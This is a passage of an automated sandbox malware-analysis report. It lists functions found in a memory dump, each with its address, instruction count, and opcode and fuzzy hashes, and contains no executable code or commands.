                            Function 00007FF848F309A0 Relevance: .2, Instructions: 213COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c339a9d6755072693a4e9034b21aebd05d7d19cbb1e6848faa4bab1a894840d0
                            • Instruction ID: 95d53ef47106c337d5ecf439bf0526bb1a3c1db884239c503e098b5d314fc2b5
                            • Opcode Fuzzy Hash: c339a9d6755072693a4e9034b21aebd05d7d19cbb1e6848faa4bab1a894840d0
                            • Instruction Fuzzy Hash: 5871A570A0891C9FDF94EF68D895BADB7F1FB69301F1401AAE00DE7291DB34A881CB40
                            Function 00007FF848F3AF90 Relevance: .2, Instructions: 206COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6125347e132b6270f7544da4f4eb505afce4cbf84589e43cc24ba3b0e9316d10
                            • Instruction ID: 0675442b174fe33ebe7dc9fa9408a7355c9b360a0ad9812abe2b0d6c625e1a01
                            • Opcode Fuzzy Hash: 6125347e132b6270f7544da4f4eb505afce4cbf84589e43cc24ba3b0e9316d10
                            • Instruction Fuzzy Hash: 50815B70C1D65E8FEB5AEB14C865AE9B7B0FF15340F0002BAD41DA71D1DB346A89CB94
                            Function 00007FF848F370C2 Relevance: .2, Instructions: 191COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 01a09a2ea0b36a5397cc435b8fc11a62279d7a8f95ffa8a0b4459e2b8134fafa
                            • Instruction ID: 3ce1fe42d9c0a9957134ed19e5f2f7f8aca7456cf45ca4c85b0a468bcd3d7ef5
                            • Opcode Fuzzy Hash: 01a09a2ea0b36a5397cc435b8fc11a62279d7a8f95ffa8a0b4459e2b8134fafa
                            • Instruction Fuzzy Hash: 5D712870D19A5D9FDB99EB28C895BE9B7F1FF58304F1041AAD00DE3292CB396981CB50
                            Function 00007FF848F32049 Relevance: .2, Instructions: 180COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 185b493ba3825351fe1a81236781845b7af58b1644dad296e56ba34831615ad7
                            • Instruction ID: ba1056f6220c9067b31fca37ed9642e6bc07a06ba866fbffef7444adc1b7a108
                            • Opcode Fuzzy Hash: 185b493ba3825351fe1a81236781845b7af58b1644dad296e56ba34831615ad7
                            • Instruction Fuzzy Hash: 9761C570A18A1D9FDF94EFA8C495AADBBF1FF59305F5000AAD00DE7295CB35A881CB00
                            Function 00007FF848F36279 Relevance: .1, Instructions: 130COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b160a73b9349aeb0167e093f4ee34cbbfe4d5799134813804f5e8eea4f800b36
                            • Instruction ID: 97e856b633f103c3f0280ab3a05f7d5380b15d220f4f8e4a65625a4590abebd5
                            • Opcode Fuzzy Hash: b160a73b9349aeb0167e093f4ee34cbbfe4d5799134813804f5e8eea4f800b36
                            • Instruction Fuzzy Hash: B9416830C0D6098FDB55EB68C459ABDBBB1FF49345F60007AD00AA72C2DB3DA805DB58
                            Function 00007FF848F30B0D Relevance: .1, Instructions: 125COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 234f09743c893c5b6ed473588a7a4ab76139d31e0c31c2a605a900c620b2401a
                            • Instruction ID: c27ff8c469acf0c10fefe1ef08bd39a9bb1ae663f4e831f23dd391885ecda9c0
                            • Opcode Fuzzy Hash: 234f09743c893c5b6ed473588a7a4ab76139d31e0c31c2a605a900c620b2401a
                            • Instruction Fuzzy Hash: 9241183291E58E9FE745B728A8526E87B70FF85254F0401BBD448D71D3DF2818078B68
                            Function 00007FF848F30B30 Relevance: .1, Instructions: 101COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c6e48dbeea33dde1deb829bbbe4b1e83e984ca415d5d361b08507923d8d47994
                            • Instruction ID: 5d5cb556af01022ca659edf475639d3be26e96ea7b0be7c0e39fb5c0c0183452
                            • Opcode Fuzzy Hash: c6e48dbeea33dde1deb829bbbe4b1e83e984ca415d5d361b08507923d8d47994
                            • Instruction Fuzzy Hash: 4031A332D1E98E9FE795B72898526E87BA0FF85254F0401B7D449E71D2DF2818068B64
                            Function 00007FF848F30B38 Relevance: .1, Instructions: 98COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dc4648a02b4bd5ae8ab238e28da4a7ce8447e9b702f30eb4003a5a77bd6ae00c
                            • Instruction ID: f6a827d232ab2f1645a9f36e81fb530c26bf6269ca7246082e8b4312f26aad72
                            • Opcode Fuzzy Hash: dc4648a02b4bd5ae8ab238e28da4a7ce8447e9b702f30eb4003a5a77bd6ae00c
                            • Instruction Fuzzy Hash: BF31D332E1E98E9FE784B72898522E877B0FFC4254F0401B7D449E72D2DF2C18068B64
                            Function 00007FF848F368D1 Relevance: .1, Instructions: 96COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: df58f88f747dc37d6bb2e5b2b3915ac42cab824a17a4a68840508ccc9f598141
                            • Instruction ID: e91ee34204f4d2f87de7b5ccb4ce064a93982d758f1fb626caefc938d4b9ed8c
                            • Opcode Fuzzy Hash: df58f88f747dc37d6bb2e5b2b3915ac42cab824a17a4a68840508ccc9f598141
                            • Instruction Fuzzy Hash: 5A31DE3191D60A9FEB85EB58C4153FABBB1FF88310F5441B6D008D32C6DF2C29498BA5
                            Function 00007FF848F30B40 Relevance: .1, Instructions: 92COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 465795124f9f6c73920d7dc181efab9166181455554297f2d5e9ed149b082021
                            • Instruction ID: ae8ab9654b900e4fe52a99135dc20ca13993c96010eed1e9733d77e61b726edd
                            • Opcode Fuzzy Hash: 465795124f9f6c73920d7dc181efab9166181455554297f2d5e9ed149b082021
                            • Instruction Fuzzy Hash: 6B31C232D1E98E8FE784B72898562E97BB0FF84250F0400B7D449E72D2DF2C18068B24
                            Function 00007FF848F30B48 Relevance: .1, Instructions: 86COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 59ef7e837395f725785722ebbc3b5532563e64bc148dce6f7b72ee04db635dc8
                            • Instruction ID: f19591c2151a3b996460367644ed9f27b8d7b4c2654e8ecf23152a49097f9562
                            • Opcode Fuzzy Hash: 59ef7e837395f725785722ebbc3b5532563e64bc148dce6f7b72ee04db635dc8
                            • Instruction Fuzzy Hash: F621BF32D1E98E8FE784B72898562A97BB1FF84240F0400B7D449E72D2DF2C28068B24
                            Function 00007FF848F30B50 Relevance: .1, Instructions: 81COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 97fbd117b3c2335f4d3374d4c9abc1fed2ae9da341964d32811f87ba4b3173c3
                            • Instruction ID: e9a7f17f9c8db1c00cef96c37a721b0f1a26171a966adac3b6f47893b56109d8
                            • Opcode Fuzzy Hash: 97fbd117b3c2335f4d3374d4c9abc1fed2ae9da341964d32811f87ba4b3173c3
                            • Instruction Fuzzy Hash: ED218031D1E98A9FEB94B72898556A97BB1FF84344F1400B7D449E32C3DF2C18068725
                            Function 00007FF848F31F25 Relevance: .1, Instructions: 79COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1b7ac98426d363956ac6628de591b05e544921c0d3266fd142aa7139b6678ca7
                            • Instruction ID: 7af69e610be4a47bcc52bb566d68ff9140a80060b5291c80f38f56bf402b22f7
                            • Opcode Fuzzy Hash: 1b7ac98426d363956ac6628de591b05e544921c0d3266fd142aa7139b6678ca7
                            • Instruction Fuzzy Hash: 29212C71D19A4C8FDF41EBA8D859AEDBBF0FF69311F040566E008E3291DB38A895CB41
                            Function 00007FF848F36500 Relevance: .1, Instructions: 78COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 78c5bedd9c217b5141b43d443161bdeafcc6036d4c527fe39f6b7a3873759c91
                            • Instruction ID: c6a3fb7c10d300cebb0b7de525b6ab09c8ba97e2ce9e74d1d541ff34b74ed902
                            • Opcode Fuzzy Hash: 78c5bedd9c217b5141b43d443161bdeafcc6036d4c527fe39f6b7a3873759c91
                            • Instruction Fuzzy Hash: 1321532088F3C64FD3435B608C285A67FB49F87250B0A01EBE489CB0E3D65D5A1AC766
                            Function 00007FF848F3F3D7 Relevance: .1, Instructions: 69COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 03c1b2ea45c04c88e4f857d11bd96f0cec3d00377c6856acbed7e23212fce64e
                            • Instruction ID: 841ae0ced784ab141881de214e42e241f2d2dba38bd03d801e7dd98315ed6b8a
                            • Opcode Fuzzy Hash: 03c1b2ea45c04c88e4f857d11bd96f0cec3d00377c6856acbed7e23212fce64e
                            • Instruction Fuzzy Hash: 3F212A30E0950A9FDB48EF94C055AFDB6A1FF58351F50413AE41EA72C6DF38A840CB64
                            Function 00007FF848F3B14F Relevance: .1, Instructions: 62COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6f591f7bd7a4063be6fe9e993a9c4b249939ff803fb54b6348397b717da7aaa0
                            • Instruction ID: 13ee23678ec7d2e549ef5e1bf545aa57bf178cf9e3098e19842da4952d8dc0b0
                            • Opcode Fuzzy Hash: 6f591f7bd7a4063be6fe9e993a9c4b249939ff803fb54b6348397b717da7aaa0
                            • Instruction Fuzzy Hash: C1212830C2861E8FEB56EF55C854BEEB7B1FF44344F1041A9D009A3294DB786A86CF90
                            Function 00007FF848F3B130 Relevance: .0, Instructions: 39COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dd840a3ba6fc1e94caa785061f45054c80e036a0905fe26a9dfc886961356f6a
                            • Instruction ID: 0c31bf5454148f4a87eb5e3e91bf4a00c77ff87a115ac421d9af0bddad858cae
                            • Opcode Fuzzy Hash: dd840a3ba6fc1e94caa785061f45054c80e036a0905fe26a9dfc886961356f6a
                            • Instruction Fuzzy Hash: 34014C30D2861E8FEB9AEF08C850BEDB7B1FF44304F10016AD419A32D0CB346A468B44
                            Function 00007FF848F361E1 Relevance: .0, Instructions: 38COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2c6b805e92ed605b3e534e83cfb7daa9e8aad1ee5926735f525727fa16424d09
                            • Instruction ID: 8fa33b82c4f5b7a7643dd27f7175aff102711337d2156543bc471db2b05ece23
                            • Opcode Fuzzy Hash: 2c6b805e92ed605b3e534e83cfb7daa9e8aad1ee5926735f525727fa16424d09
                            • Instruction Fuzzy Hash: B1F08C70C0D60D8FEB10BB6099092F9BBB0EF5A300F421963D408E2191EF2891548659
                            Function 00007FF848F3B13C Relevance: .0, Instructions: 35COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 166163c8378f229eea68e2dc34c1e2ef6b061ea9f4bdb2c966ad0dbc8eb7cbb8
                            • Instruction ID: fc176478bae931f6130845e92a415a13b6df02d3bdee33d8cbde283f2aab0819
                            • Opcode Fuzzy Hash: 166163c8378f229eea68e2dc34c1e2ef6b061ea9f4bdb2c966ad0dbc8eb7cbb8
                            • Instruction Fuzzy Hash: 0C01E870C1861E8FDB9AEF48C854BEDB7B5FF48304F5041AAD409A3290DB346A868F44
                            Function 00007FF848F35F41 Relevance: .0, Instructions: 35COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dfd478aca7dedd666082187885e8623e537b1de70b88e7c51b1e482f2ec77abf
                            • Instruction ID: e9262871769eab60d841c2c7ad0355676d0c8b6fbbd35f208c8ead97ce0fd323
                            • Opcode Fuzzy Hash: dfd478aca7dedd666082187885e8623e537b1de70b88e7c51b1e482f2ec77abf
                            • Instruction Fuzzy Hash: 98F0EC7080D68C9FE701AB70885D2E8BFB1EF59310F0608FBE848C7082EB38A564C701
                            Function 00007FF848F3B146 Relevance: .0, Instructions: 32COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ac9d330dc44ba4627c05e92ef46d9b7ba68e1f924bfa1357f2fa80fd9958b70e
                            • Instruction ID: b55de51a78ecad5f783c40400b3b696ab5cfabf598bd5464f291271b6c5e344d
                            • Opcode Fuzzy Hash: ac9d330dc44ba4627c05e92ef46d9b7ba68e1f924bfa1357f2fa80fd9958b70e
                            • Instruction Fuzzy Hash: 9DF04F70C1860E8FEB9AEF18C455BEDB7B0FF04300F100169D409A32D0CB346A46CB94
                            Function 00007FF848F3DA07 Relevance: .0, Instructions: 25COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 90d135d17d471401e2c84608003236e8bf900693ed57d148bdf3a4b2f39fdee9
                            • Instruction ID: 222ce3acc3e73200f66d13be22c72d757b832127a93f39a6f5d9db476a14a8a7
                            • Opcode Fuzzy Hash: 90d135d17d471401e2c84608003236e8bf900693ed57d148bdf3a4b2f39fdee9
                            • Instruction Fuzzy Hash: 9FF01D71D0951A8FE758EB2088546E8B270EB51350F0401BE941EA72E1DB34298A8E54
                            Function 00007FF848F37C62 Relevance: .0, Instructions: 22COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5cba62cde92bc260ae70cc342440acccdb82b459d5b9db2ed0385c25e54148f0
                            • Instruction ID: ed7b2983db3afd48f7a42be128f255d9e1621741d603da4b6b1199d5fd472a74
                            • Opcode Fuzzy Hash: 5cba62cde92bc260ae70cc342440acccdb82b459d5b9db2ed0385c25e54148f0
                            • Instruction Fuzzy Hash: 55E0B635E4895C8ECF90EB48D848BECB7B1EB58350F0002A2D04DE7150DB3069C18F44
                            Function 00007FF848F3DA8B Relevance: .0, Instructions: 20COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.4501972846.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff848f30000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9aa64529a2179cb5787c724ef29816e9a789c449f33020dd5e743c8afe78acea
                            • Instruction ID: ce454b7663908e3ed332802dddf005e0f42b47728512d322e8a6a340de9d09e5
                            • Opcode Fuzzy Hash: 9aa64529a2179cb5787c724ef29816e9a789c449f33020dd5e743c8afe78acea
                            • Instruction Fuzzy Hash: 04E0C071D0552A8FE759EB14C8956E8B270EB50340F0041FA941EA71D1DF342A85CE54